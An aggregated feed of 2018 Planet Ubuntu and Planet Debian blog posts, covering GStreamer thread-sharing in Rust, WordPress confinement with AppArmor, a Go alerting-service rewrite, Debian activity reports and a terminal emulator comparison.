
Feed aggregator

Xubuntu: Xubuntu 18.04 Community Wallpaper Contest Winners!

Planet Ubuntu - Fri, 06/04/2018 - 12:36am

The Xubuntu team are happy to announce the results of the 18.04 community wallpaper contest!

We want to send out a huge thanks to every contestant; last time we had 92 submissions, but this time you all made us work much harder at picking out the best ones, with a total of 162 submissions! Great work! All of the submissions are browsable on the 18.04 contest page at contest.xubuntu.org.

Without further ado, here are the winners:

Note that the images listed above are resized for the website. For the full size images (up to 4K resolution!), make sure you have the package xubuntu-community-wallpapers installed. The package is installed by default in all new Xubuntu 18.04 installations.

Sebastian Dröge: Improving GStreamer performance on a high number of network streams by sharing threads between elements with Rust’s tokio crate

Planet Ubuntu - Thu, 05/04/2018 - 5:21pm

For one of our customers at Centricular we were working on a quite interesting project. Their use-case was basically to receive an as-high-as-possible number of audio RTP streams over UDP, transcode them, and then send them out via UDP again. Due to how GStreamer usually works, they were running into some performance issues.

This blog post will describe the first set of improvements that were implemented for this use-case, together with a minimal benchmark and the results. My colleague Mathieu will follow up with one or two other blog posts with the other improvements and a more full-featured benchmark.

The short version is that CPU usage decreased by about 65-75%, i.e. allowing 3-4x more streams with the same CPU usage. Also parallelization works better and usage of different CPU cores is more controllable, allowing for better scalability. And a fixed, but configurable number of threads is used, which is independent of the number of streams.

The code for this blog post can be found here.

Table of Contents
  1. GStreamer & Threads
  2. Thread-Sharing GStreamer Elements
  3. Available Elements
  4. Little Benchmark
  5. Conclusion
GStreamer & Threads

In GStreamer, by default each source is running from its own OS thread. Additionally, for receiving/sending RTP, there will be another thread in the RTP jitterbuffer, yet another thread for receiving RTCP (another source) and a last thread for sending RTCP at the right times. And RTCP has to be received and sent for both the receiver and sender side part of the pipeline, so the number of threads doubles. In sum, this gives at least 1 + 1 + (1 + 1) * 2 = 6 threads per RTP stream in this scenario. In a normal audio scenario, there will be one packet received/sent e.g. every 20ms on each stream, and every now and then an RTCP packet. So most of the time all these threads are only waiting.

Apart from the obvious waste of OS resources (1000 streams would be 6000 threads), this also brings down performance, as threads are being woken up all the time, which means that context switches have to happen basically all the time.

To solve this we implemented a mechanism to share threads; as a result we have a fixed, but configurable number of threads that is independent of the number of streams. We can run e.g. 500 streams just fine on a single thread on a single core, which was completely impossible before. In addition, we also did some work to reduce the number of allocations for each packet, so that after startup no additional per-packet allocations happen for buffers anymore. See Mathieu’s upcoming blog post for details.

In this blog post, I’m going to write about a generic mechanism for sources, queues and similar elements to share their threads between each other. For the RTP related bits (RTP jitterbuffer and RTCP timer) this was not used due to reuse of existing C codebases.

Thread-Sharing GStreamer Elements

The code in question can be found here, a small benchmark is in the examples directory and it is going to be used for the results later. A full-featured benchmark will come in Mathieu’s blog post.

This is a new GStreamer plugin, written in Rust around the Tokio crate, which provides asynchronous IO and generally acts as a “task scheduler”.

While this could certainly also have been written in C around something like libuv, doing this kind of work in Rust is simply more productive and fun due to its safety guarantees and the strong type system, which definitely reduced the amount of debugging a lot. In addition, “modern” language features like closures make working with futures much more ergonomic.
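To make the thread-sharing idea concrete, here is a minimal sketch of the same pattern with a current tokio (1.x) runtime, rather than the tokio 0.1 API the plugin was actually built against. This is not the plugin's code; the port range and packet handling are placeholders. It only illustrates multiplexing hundreds of UDP receivers onto a single OS thread:

// Cargo.toml (assumed): tokio = { version = "1", features = ["rt", "net", "macros"] }
use tokio::net::UdpSocket;

async fn receive_stream(port: u16) -> std::io::Result<()> {
    let socket = UdpSocket::bind(("0.0.0.0", port)).await?;
    let mut buf = vec![0u8; 1500];
    loop {
        // Awaiting here yields the OS thread to all the other streams
        // instead of blocking it.
        let (_len, _addr) = socket.recv_from(&mut buf).await?;
        // ... hand the packet on to the rest of the processing ...
    }
}

#[tokio::main(flavor = "current_thread")] // one OS thread for every stream
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    let mut tasks = Vec::new();
    for port in 5000u16..5500 {
        // 500 "streams", each a cheap task rather than an OS thread
        tasks.push(tokio::spawn(receive_stream(port)));
    }
    for task in tasks {
        task.await??;
    }
    Ok(())
}

The key point is that each .await hands the single thread back to the scheduler, so hundreds of idle streams cost next to nothing while they wait for packets.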

When using these elements it is important to have full control over the pipeline and its elements, and the dataflow inside the pipeline has to be carefully considered to properly configure how to share threads. For example the following two restrictions should be kept in mind all the time:

  1. Downstream of such an element, the streaming thread must never ever block for considerable amounts of time. Otherwise all other elements inside the same thread-group would be blocked too, even if they could otherwise do work right now
  2. This generally all works better in live pipelines, where media is produced in real-time and not as fast as possible
Available Elements

So this repository currently contains the generic infrastructure (see the src/iocontext.rs source file) and a couple of elements:

  • a UDP source: ts-udpsrc, a replacement for udpsrc
  • an app source: ts-appsrc, a replacement for appsrc to inject packets into the pipeline from the application
  • a queue: ts-queue, a replacement for queue that is useful for adding buffering to a pipeline part. The upstream side of the queue will block if not called from another thread-sharing element, but if called from another thread-sharing element it will pause the current task asynchronously; that is, it stops the upstream task from producing more data.
  • a proxysink/src element: ts-proxysrc, ts-proxysink, replacements for proxysink/proxysrc for connecting two pipelines with each other. This basically works like the queue, but split into two elements.
  • a tone generator source around spandsp: ts-tonesrc, a replacement for tonegeneratesrc. This also contains some minimal FFI bindings for that part of the spandsp C library.

All these elements have more or less the same API as their non-thread-sharing counterparts.

API-wise, each of these elements has a set of properties for controlling how it is sharing threads with other elements, and with which elements:

  • context: A string that defines which group this element belongs to. All elements with the same context run on the same thread or group of threads.
  • context-threads: Number of threads to use in this context. -1 means exactly one thread, 1 and above uses N+1 threads (1 thread for polling fds, N worker threads) and 0 sets N to the number of available CPU cores. As long as no considerable work is done in these threads, -1 has proven to be the most efficient. See also this tokio GitHub issue
  • context-wait: Number of milliseconds that the threads will wait on each iteration. This reduces CPU usage even further by handling all events/packets that arrived during that timespan at once, instead of waking up the thread every time a small event happens, thus reducing context switches again

The elements all push data downstream from a tokio thread whenever data is available, assuming that downstream does not block. If downstream is another thread-sharing element and it would have to block (e.g. a full queue), it instead returns a new future to upstream so that upstream can asynchronously wait on that future before producing more output. In this way, back-pressure is implemented between different GStreamer elements without ever blocking any of the tokio threads. All this is implemented around the normal GStreamer data-flow mechanisms; there is no “tokio fast-path” between elements.
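As a rough illustration of how such a pipeline might be assembled from the Rust GStreamer bindings, here is a hedged sketch. The element and property names come from this post, but the port property, the exact property types and the use of parse_launch (spelled gst::parse::launch in newer crate versions) are my assumptions, not something the post specifies:

// Cargo.toml (assumed): the gstreamer crate; adjust the API to your crate version.
use gstreamer as gst;
use gst::prelude::*;

fn main() -> Result<(), Box<dyn std::error::Error>> {
    gst::init()?;

    // Two receivers in the same "rtp" context share one thread; context-wait
    // batches packet handling into 20 ms iterations.
    let pipeline = gst::parse_launch(
        "ts-udpsrc port=5004 context=rtp context-threads=-1 context-wait=20 ! fakesink \
         ts-udpsrc port=5006 context=rtp context-threads=-1 context-wait=20 ! fakesink",
    )?;

    pipeline.set_state(gst::State::Playing)?;
    // For a real application, run a main loop and watch the bus instead of sleeping.
    std::thread::sleep(std::time::Duration::from_secs(10));
    pipeline.set_state(gst::State::Null)?;
    Ok(())
}

Because the pipeline description is parsed from a string, GStreamer converts the property values itself, which sidesteps having to get the exact GLib property types right in Rust.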

Little Benchmark

As mentioned above, there’s a small benchmark application in the examples directory. This basically sets up a configurable number of streams and directly connects them to a fakesink, throwing away all packets. Additionally there is another thread that is sending all these packets. As such, this is really the most basic benchmark and not very realistic but nonetheless it shows the same performance improvement as the real application. Again, see Mathieu’s upcoming blog post for a more realistic and complete benchmark.

When running it, make sure that your user can create enough fds. The benchmark will just abort if not enough fds can be allocated. You can control this with ulimit -n SOME_NUMBER, and allowing a couple of thousand is generally a good idea. The benchmarks below were run with 10000.

After running cargo build --release to build the plugin itself, you can run the benchmark with:

cargo run --release --example udpsrc-benchmark -- 1000 ts-udpsrc -1 1 20

and in another shell the UDP sender with

cargo run --release --example udpsrc-benchmark-sender -- 1000

This runs 1000 streams, uses ts-udpsrc (the alternative would be udpsrc), configures exactly one thread (-1), 1 context, and a wait time of 20ms. See above for what these settings mean. You can check CPU usage with e.g. top. Testing was done on an Intel i7-4790K, with Rust 1.25 and GStreamer 1.14. One packet is sent every 20ms for each stream.

Source     Streams  Threads  Contexts  Wait  CPU
udpsrc     1000     1000     x         x     44%
ts-udpsrc  1000     -1       1         0     18%
ts-udpsrc  1000     -1       1         20    13%
ts-udpsrc  1000     -1       2         20    15%
ts-udpsrc  1000     2        1         20    16%
ts-udpsrc  1000     2        2         20    27%

Source     Streams  Threads  Contexts  Wait  CPU
udpsrc     2000     2000     x         x     95%
ts-udpsrc  2000     -1       1         20    29%
ts-udpsrc  2000     -1       2         20    31%

Source     Streams  Threads  Contexts  Wait  CPU
ts-udpsrc  3000     -1       1         20    36%
ts-udpsrc  3000     -1       2         20    47%

Results for 3000 streams for the old udpsrc are not included as starting up that many threads needs too long.

The best configuration is apparently a single thread per context (see this tokio GitHub issue) and waiting 20ms on every iteration. Compared to the old udpsrc, CPU usage is about one third in that setting, and generally it seems to parallelize well. It’s not clear to me why the last test uses 11% more CPU with two contexts, while in every other test the number of contexts does not really make a difference, and it also doesn’t for that many streams in the real test-case.

The waiting does not reduce CPU usage a lot in this benchmark, but on the real test-case it does. The reason is most likely that this benchmark basically sends all packets at once, then waits for the remaining time, then sends the next packets.

Take these numbers with caution, the real test-case in Mathieu’s blog post will show the improvements in the bigger picture, where it was generally a quarter of CPU usage and almost perfect parallelization when increasing the number of contexts.

Conclusion

Generally this was a fun exercise and we’re quite happy with the results, especially the real results. It took me some time to understand how tokio works internally so that I could implement all kinds of customizations on top of it, but for normal usage of tokio that should not be required, and the overall design makes a lot of sense to me, as does the way futures are implemented in Rust. It requires some learning and understanding of how exactly the API can be used and behaves, but once that point is reached it seems like a very productive and performant solution for asynchronous IO. And modelling asynchronous IO problems with Rust-style futures seems a nice and intuitive fit.

The performance measurements also showed that GStreamer’s default usage of threads is not always optimal, and a model like in upipe or pipewire (or rather SPA) can provide better performance. But as this also shows, it is possible to implement something like this on top of GStreamer and for the common case, using threads like in GStreamer reduces the cognitive load on the developer a lot.

For a future version of GStreamer, I don’t think we should make the threading “manual” like in these two other projects, but instead provide some API additions that make it nicer to implement thread-sharing elements and to add ways in the GStreamer core to make streaming threads non-blocking. All this can be implemented already, but it could be nicer.

All this “only” improved the number of threads, and thus the threading and context switching overhead. Many other optimizations in other areas are still possible on top of this, for example optimizing receive performance and reducing the number of memory copies inside the pipeline even further. If that’s something you would be interested in, feel free to get in touch.

And with that: Read Mathieu’s upcoming blog posts about the other parts, RTP jitterbuffer / RTCP timer thread sharing, and no allocations, and the full benchmark.

Dustin Kirkland: I'm Joining the Google Cloud Team!

Planet Ubuntu - Thu, 05/04/2018 - 1:48am

A couple of months ago, I reflected on "10 Amazing Years of Ubuntu and Canonical".  Indeed, it has been one hell of a ride, and that post is merely the tip of the proverbial iceberg...

The people I've met, the things I've learned, the places I've been, the users I've helped, the partners I've enabled, the customers I've served -- these are undoubtedly the most amazing and cherished experiences of my professional career to date.

And for the first time in my life, I can fully and completely grok the Ubuntu philosophy:
I am who I am, because of who we all are

With all my heart, I love what we've created in Ubuntu, I love the products that we've built at Canonical, I love each and every person involved.

So, it is with mixed emotion that the Canonical chapter of my life comes to a close and a new one begins...

Next week, I have the honor and privilege to join the Google Cloud product management team, and work beside so, so, so, so many people who continue to inspire me.

Words fail to express how excited I am about this opportunity!  In this new role, I will be working closely with Aparna Sinha, Michael Rubin, and Tim Hockin, and I hope to see many of you at KubeCon Europe in Copenhagen later this month.

My friends and family will be happy to know that we're staying here in Austin, and I'll be working from the Google Austin office with my new team, largely based in Sunnyvale, California.

The Ubuntu community can expect to see me remaining active in the Ubuntu developer community as a Core Dev and a MOTU, and I will continue to maintain many of the dozens of open source projects and packages that so many of you have come to rely upon.  Perhaps I'll even become more active upstream in Debian, if the Debian community will have me there too :-)

Finally, an enormous THANK YOU to everyone who has made this journey through Ubuntu and Canonical such a warm, rewarding, emotional, exceptional experience!

Cheers,
@DustinKirkland

Raphaël Hertzog: My Free Software Activities in March 2018

Planet Ubuntu - Wed, 04/04/2018 - 12:22pm

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Distro Tracker

I reviewed and merged 14 merge requests from multiple contributors:

On top of this, I updated the Salsa/AliothMigration wiki page with information about how to best leverage tracker.debian.org when you migrate to salsa.

I also filed a few issues for bugs or things that I’d like to see improved:

I also gave my feedback about multiple mockups prepared by Chirath R in preparation of his Google Summer of Code project proposal.

Security Tools Packaging Team

Following the departure of alioth, the new list that we requested on lists.debian.org has been created: https://lists.debian.org/debian-security-tools/

I updated (in the git repositories) all the Vcs-* and all the Maintainer fields of the packages maintained by the team.

I prepared and uploaded afflib 3.7.16-3 to fix RC bug #892599. I sponsored rhash 1.3.6 for Aleksey Kravchenko, ccrypt 1.10-5 for Alexander Kulak and ledger-wallets-udev 0.1 for Stephne Neveu.

Debian Live

This project also saw an unexpected resurgence of activity and I had to review and merge many merge requests:

It’s nice to see two derivatives being so active in upstreaming their changes.

Misc stuff

Hamster time tracker. I was regularly hit by a bug leading to a gnome-shell crash (leading to a graphical session crash due to the design of wayland) and this time I decided that enough was enough, so I started to dig into the code and did my best to fix the issues I encountered. During the month, I tested multiple versions and submitted three pull requests. Right now, the version in git is working fine for me. Still, it really smells of bad design that mistakes in shell extensions can have such dramatic consequences.

Packaging. I forwarded #892063 to upstream in a new ticket. I updated zim to version 0.68 (final release replacing release candidate that I had already packaged). I filed #893083 suggesting that the hello source package should be a model for other packages and as such it should have a git repository hosted on salsa.debian.org.

Sponsorship. I sponsored pylint-django 0.9.4-1 for Joseph Herlant. I also sponsored urwid 2.0.1-1 (new upstream version), xlwt 1.3.0-1 (new version with python 3 support), elastalert 0.1.29-1 (new upstream release and RC bug fix) which have been updated for Freexian customers.

Thanks

See you next month for a new summary of my activities.


Securing WordPress with AppArmor

Planet Debian - Sat, 31/03/2018 - 12:24pm

WordPress is a very popular CMS. According to one report, 30% of websites use WordPress, which is an impressive feat.

Despite this popularity, WordPress is built upon PHP, which is often lacking in the security department. Add to this that the user running the webserver often has a fair bit of access, and that there is no distinguishing between the webserver code and the WordPress code, and you set yourself up for trouble.

So, let’s introduce something that not only can tell the difference between Apache running and WordPress running under it, but also limit what WordPress can access.

As the AppArmor wiki says “AppArmor is Mandatory Access Control (MAC) like security system for Linux. AppArmor confines individual programs to a set of files, capabilities, network access and rlimits…”.  AppArmor also has this concept of hats, so your webserver code (e.g. apache) can be one hat with one policy but the WordPress PHP code has another hat and therefore another policy. For some reason, AppArmor calls a policy a profile, so wherever you see profile translate that to policy.

The idea here is to limit what WordPress can access down to the files and directories it needs, and nothing more. What follows is how I have setup my system but you may need to tweak it, especially for some plugins.

Change your hat

By default, apache will run in its own  AppArmor profile, called something like the “/usr/sbin/apache2” profile.  As the authors of this profile do not know what you will run on the webserver, it is very permissive and with the standard AppArmor setup is what the WordPress code will also run under.

First, you need to enable and install the mod_apparmor Apache module. This module allows you to change what profile is used, depending on what directory or URL is being requested. The link for mod_apparmor describes how to do this.

Once you have the module enabled, you need to tell Apache for which directories you want the hat or profile to be changed, and the name of the new hat. I put this into /etc/apache2/conf-available/wordpress and then “a2enconf wordpress”

<Directory "/usr/share/wordpress">
  Require all granted
  <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
  </IfModule>
  <IfModule mod_apparmor.c>
    AAHatName wordpress
  </IfModule>
</Directory>

Alias /wp-content /var/lib/wordpress/wp-content/

<Directory /var/lib/wordpress>
  Require all granted
  <IfModule mod_apparmor.c>
    AAHatName wordpress
  </IfModule>
</Directory>

Most of this configuration is pretty standard WordPress setup for Apache. The important differences are the AAHatName lines.

What we have done here is if Apache serves up files from /usr/share/wordpress (where the WordPress code lives) or /var/lib/wordpress/wp-content (where things like plugins, themes and uploaded images live) then it will use the wordpress sub-profile.

Defining the profile

Now that we have the right profile for our WordPress directories, we need to create a profile. This will tell AppArmor what files and directories WordPress is allowed to access and how they are accessed. Obvious ones are the directories where the code and content live, but you will also need to include the log file locations.

This definition needs to sit “inside” the apache proper profile. In Debian and most other systems, it is just a matter of making a file in the /etc/apparmor.d/apache.d/ directory.

^wordpress {
  include <abstractions/apache2-common>
  include <abstractions/base>
  include <abstractions/nameservice>
  include <abstractions/php5>

  /var/log/apache2/*.log w,

  /etc/wordpress/config-*.php r,
  /usr/share/wordpress/** r,
  /usr/share/wordpress/.maintenance w,

  # Change "/var/lib/wordpress/wp-content" to whatever you set
  # WP_CONTENT_DIR to in the /etc/wordpress/config-*.php file
  /var/lib/wordpress/wp-content r,
  /var/lib/wordpress/wp-content/** r,
  /var/lib/wordpress/wp-content/uploads/** rw,
  /var/lib/wordpress/wp-content/upgrade/** rw,

  # Uncomment to permit plugins Install/Update via web
  /var/lib/wordpress/wp-content/plugins/** rw,
  # Uncomment to permit themes Install/Update via web
  #/var/lib/wordpress/wp-content/themes/** rw,

  # This is what PHP sys_get_temp_dir() returns
  /tmp/* rw,
}

What we have here is a policy that basically says you can read the WordPress code and read the WordPress content. The plugins and themes sub-directories get their own lines because you can selectively permit write access if you want to update plugins and themes using the web GUI.

The /etc file glob is where the Debian package stores its configuration file. The surprise for me was the maintenance dot-file which is created when WordPress is updating some component. Without this write permission, it is unable to update plugins or do many other things.

Audit Log

So how do you know its working? The simplest way is to apply the policy and then see what appears in your auditd log (Mine is at /var/log/audit/audit.log).

Two main things will go wrong. The first is the wrong profile will get used. I had this problem when I forgot to add the WordPress content directory.

Wrong Profile

type=AVC msg=audit(1522235033.386:43401): apparmor="ALLOWED" operation="open" profile="/usr/sbin/apache2//null-dropbear.xyz" name="/var/lib/wordpress/wp-content/plugins/akismet/akismet.php" pid=5036 comm="apache2" requested_mask="r" denied_mask="r" fsuid=33 ouid=33

So, what is AppArmor trying to say here? First, we have the wrong profile! It’s not wordpress, but "/usr/sbin/apache2//null-dropbear.xyz", which is basically saying there was no specific sub-profile for this website, so the apache2 profile is used.

The apache2 profile is in complain, not enforce mode, so that’s why it says apparmor="ALLOWED" yet has denied_mask="r".

Adding that second <Directory> clause to use the wordpress AAHatName fixed this.

Profile missing entries

The second type of problem is that you have Apache switching to the correct profile but you missed a line in the profile.  Initially I didn’t know WordPress created a file in the top-level of its code directory when undergoing maintenance. The log file showed:

type=AVC msg=audit(1522318023.409:51143): apparmor="DENIED" operation="mknod" profile="/usr/sbin/apache2//wordpress" name="/usr/share/wordpress/.maintenance" pid=16165 comm="apache2" requested_mask="c" denied_mask="c" fsuid=33 ouid=33

We have the correct profile here (wordpress is always a sub-profile of apache). But we are getting a DENIED message because the profile (initially) didn’t permit the file /usr/share/wordpress/.maintenance to be created.

Adding that file to the profile and reloading the profile and Apache fixed this.

Additional Tweaks

The given profile will probably work for most WordPress installations. Make sure you change the code and content directories to wherever yours live. Also, this profile will not let you auto-update the WordPress code. For a Debian package, this is a good thing, as the Apache process is not writing the new files; dpkg is, and it runs as root. If you are happy for a webserver to update PHP code that runs under it, you can change the permission to read/write for /usr/share/wordpress.

I imagine some plugins out there will need additional directories. I don’t use many and none I use do those odd things, but there are plenty of odd plugins out there. Check your audit logs for any DENIED lines.

Craig http://dropbear.xyz Small Dropbear

three conferences one week

Planet Debian - Sat, 31/03/2018 - 3:52am

Thought I'd pack my entire year's conference schedule into one week...

First was a Neuroinformatics infrastructure interoperability workshop at McGill, my second trip to Montreal this year. Well outside my wheelhouse, but there's a fair amount of interest in that community in git-annex/datalad. This was a "roll with the acronyms and try to draw parallels to things I know" affair. Also excellent sushi and a bonus Secure Scuttlebutt meetup.

Then LibrePlanet. A unique and super special conference, that utterly flew by this year. This is my sixth LibrePlanet and I enjoy it more each time. Highlights for me were Bassam's photogrammetry workshop, Karen receiving the Free Software award, and Seth's thought-provoking talk on "incompossibilities" especially as applied to social networks. And some epic dinner conversations in central square.

Finally today, a one-day local(!) functional programming(!!) conference in Knoxville TN. Lambda Squared was the best constructed single-track conference I've seen. Starting with an ex-pro-figure skater getting the whole audience to pirouette to capture that uncomfortable out of your element feeling you get learning FP, and ramping gradually past "functional javascript" to orthogonality, contravariant functors, the lambda cube, and constructivist logic.

I notice that I've spent a lot more time in Boston than I ever have in Knoxville -- Cambridge MA is starting to feel like my old haunts, though I've never really lived there. There are not a lot of functional programming conferences in the southeastern USA, and I think this explains how Lambda Squared attracted such a good lineup of speakers. Also Knoxville has a surprisingly large and lively FP community shaping up. There will be another Lambda Squared next year, and this might be a good opportunity to visit with me and go to a FP conference too.

And now time to retreat into my retreaty place for a good long while.

Joey Hess http://joeyh.name/blog/ see shy jo

Cluster analysis lecture notes

Planet Debian - Fri, 30/03/2018 - 5:33pm

In Winter Term 2017/2018 I was substitute professor at the University of Heidelberg, giving the lecture “Knowledge Discovery in Databases”, i.e., the data mining lecture.

While I won’t make all my slides available, I decided to make the chapter on cluster analysis available. Largely, because there do not appear to be good current books on this topic. Many of the books on data mining barely cover the basics. And I am constantly surprised to see how little people know beyond k-means. But clustering is much broader than k-means!

As I hope to give this lecture frequently at some point, I appreciate feedback to further improve them. This year, I almost completely reworked them, so there are a lot of things to fine tune.

There exist three versions of the slides:

These slides took me about 9 sessions of 90 minutes each.
On one hand, I was not very fast this year, and I probably need to cut down on the extra blackboard material, too. Next time, I would try to use at most 8 sessions for this, to be able to cover other important topics, such as outlier detection, in more detail; those got a bit too little time this round.

I hope the slides will be interesting and useful, and I would appreciate if you give me credit, e.g., by citing my work appropriately.

Erich Schubert https://www.vitavonni.de/blog/ Techblogging

My Laptop

Planet Debian - Fri, 30/03/2018 - 10:32am

My laptop is an old used Samsung R439 that I bought for around Rs 12000/- (USD 185) from a local store when I was in my second year of college. It has a 14” screen, 2GB of RAM, a Pentium p1600 processor, and a 320GB HDD.

Recently it started showing performance issues, like applications taking a while to load and Firefox freezing. I am quite fond of this laptop and have some emotional attachment to it. I was reluctant to buy a new one, but at the same time I need the VT-x (virtualization) feature that my pentium p1600 lacks. So I chose to upgrade it from the ground up. The hard part of upgrading was finding a compatible processor for the board. My friend Akhil Varkey, whom I met during a Debian packaging session, helped me find a processor that suits my board. I bought the suggested one from Aliexpress, because I found it cheaply available there. I disassembled the laptop and installed the new processor myself. During disassembly I totally destroyed two screws (stripped), including the holes :(. Now I need to be more careful when carrying the laptop around. I had already changed my laptop battery and keyboard a couple of months after I bought it. I will be upgrading the RAM and hard disk soon.

Abhijith PA http://abhijithpa.me/ Abhijith PA

Rewriting some services in golang

Planet Debian - Fri, 30/03/2018 - 9:00am

The past couple of days I've been reworking a few of my existing projects, and converting them from Perl into Golang.

Bytemark had a great alerting system for routing alerts to different engineers, via email, SMS, and chat-messages. The system is called mauvealert and is available here on github.

The system is built around the notion of alerts which have different states (such as "pending", "raised", or "acknowledged"). Each alert is submitted via a UDP packet getting sent to the server with a bunch of fields:

  • Source IP of the submitter (this is implicit).
  • A human-readable ID such as "heartbeat", "disk-space-/", "disk-space-/root", etc.
  • A raise-field.
  • More fields here ..

Each incoming submission is stored in a database, and events are considered unique based upon the source+ID pair, such that if you see a second submission from the same IP, with the same ID, then any existing details are updated. This update-on-receive behaviour is pretty crucial to the way things work, especially when coupled with the "raise"-field.

A raise field might have values such as:

  • +5m
    • This alert will be raised in 5 minutes.
  • now
    • This alert will be raised immediately.
  • clear
    • This alert will be cleared immediately.

One simple way the system is used is to maintain heartbeat-alerts. Imagine a system sends the following message, every minute:

  • id:heartbeat raise:+5m [source:1.2.3.4]
    • The first time this is received by the server it will be recorded in the database.
    • The next time this is received the existing event will be updated, and crucially the time to raise an alert will be bumped (i.e. it will become current-time + 5m).
    • The next time the update is received the raise-time will also be bumped
    • ..

At some point the submitting system crashes, and five minutes after the last submission the alert moves from "pending" to "raised" - which will make it visible in the web-based user-interface, and also notify an engineer.

With this system you could easily write trivial and stateless ad-hoc monitoring scripts like the following, which would raise or clear an alert:

curl https://example.com && send-alert --id http-example.com --raise clear --detail "site ok" || \
  send-alert --id http-example.com --raise now --detail "site down"

In short mauvealert allows aggregation of events, and centralises how/when engineers are notified. There's the flexibility to look at events, and send them to different people at different times of the day, decide some are urgent and must trigger SMSs, and some are ignorable and just generate emails.

(In mauvealert this routing is done by having a configuration file containing ruby, this attempts to match events so you could do things like say "If the event-id contains "failed-disc" then notify a DC-person, or if the event was raised from $important-system then notify everybody.)

I thought the design was pretty cool, and wanted something similar for myself. My version, which I set up a couple of years ago, was based around HTTP+JSON, rather than UDP-messages, and written in perl:

The advantage of using HTTP+JSON is that writing clients to submit events to the central system could easily and cheaply be done in multiple environments for multiple platforms. I didn't see the need for the efficiency of using binary UDP-based messages for submission, given that I have ~20 servers at the most.
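For illustration, such a client can be little more than an HTTP POST with a JSON body. The following Rust sketch uses reqwest (with the blocking and json features) and serde_json; the endpoint URL and the field names are assumptions, since the post does not document the actual JSON schema:

// Cargo.toml (assumed):
//   reqwest = { version = "0.11", features = ["blocking", "json"] }
//   serde_json = "1"
use serde_json::json;

fn main() -> Result<(), Box<dyn std::error::Error>> {
    // source+id identifies the event; re-submitting bumps the raise deadline.
    let event = json!({
        "id": "heartbeat",           // hypothetical field name
        "raise": "+5m",              // deadman-switch style raise time
        "detail": "host is alive",
    });

    reqwest::blocking::Client::new()
        .post("https://alerts.example.com/events") // hypothetical endpoint
        .json(&event)
        .send()?
        .error_for_status()?;
    Ok(())
}

Run from cron every minute, this behaves exactly like the heartbeat example above: each submission pushes the raise deadline another five minutes into the future.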

Anyway the point of this blog post is that I've now rewritten my simplified personal-clone as a golang project, which makes deployment much simpler. Events are stored in an SQLite database and when raised they get sent to me via pushover:

The main difference is that I don't allow you to route events to different people, or notify via different mechanisms. Every raised alert gets sent to me, and only me, regardless of time of day. (Albeit via a pluggable external process such that you could add your own local logic.)

I've written too much already, getting sidetracked by explaining how neat mauvealert (and by extension purple) is, but I also rewrote the Perl DNS-lookup service at https://dns-api.org/ in golang too:

That had a couple of regressions which were soon reported and fixed by a kind contributor (lack of CORS headers, most obviously).

Steve Kemp https://blog.steve.fi/ Steve Kemp's Blog

Debian Policy call for participation -- March 2018

Planet Debian - Fri, 30/03/2018 - 2:23am

We’re getting close to a new release of Policy. Just this week Adam Borowski stepped up to get a patch written for #881431 – thanks for getting things moving along!

Please consider jumping into some of these bugs.

Consensus has been reached and help is needed to write a patch

#823256 Update maintscript arguments with dpkg >= 1.18.5

#833401 virtual packages: dbus-session-bus, dbus-default-session-bus

#835451 Building as root should be discouraged

#838777 Policy 11.8.4 for x-window-manager needs update for freedesktop menus

#845715 Please document that packages are not allowed to write outside thei…

#853779 Clarify requirements about update-rc.d and invoke-rc.d usage in mai…

#874019 Note that the '-e' argument to x-terminal-emulator works like '--'

#874206 allow a trailing comma in package relationship fields

Wording proposed, awaiting review from anyone and/or seconds by DDs

#756835 Extension of the syntax of the Packages-List field.

#786470 [copyright-format] Add an optional “License-Grant” field

#835451 Building as root should be discouraged

#845255 Include best practices for packaging database applications

#846970 Proposal for a Build-Indep-Architecture: control file field

#864615 please update version of posix standard for scripts (section 10.4)

#881431 Clarify a version number is unique field

#892142 update example to use default-mta instead of exim

Merged for the next release (no action needed)

#299007 Transitioning perms of /usr/local

#515856 remove get-orig-source

#742364 Document debian/missing-sources

#886890 Fix for found typos

#888437 Several example scripts are not valid.

#889960 stray line break at clean target in section 4.9

#892142 update example to use default-mta instead of exim

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

A look at terminal emulators, part 1

Planet Debian - Fri, 30/03/2018 - 2:00am

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal        Debian         Fedora   Upstream  Notes
Alacritty       N/A            N/A      6debc4f   no releases, Git head
GNOME Terminal  3.22.2         3.26.2   3.28.0    uses GTK3, VTE
Konsole         16.12.0        17.12.2  17.12.3   uses KDE libraries
mlterm          3.5.0          3.7.0    3.8.5     uses VTE, "Multi-lingual terminal"
pterm           0.67           0.70     0.70      PuTTY without ssh, uses GTK2
st              0.6            0.7      0.8.1     "simple terminal"
Terminator      1.90+bzr-1705  1.91     1.91      uses GTK3, VTE
urxvt           9.22           9.22     9.22      main rxvt fork, also known as rxvt-unicode
Xfce Terminal   0.8.3          0.8.7    0.8.7.2   uses GTK3, VTE
xterm           327            330      331       the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

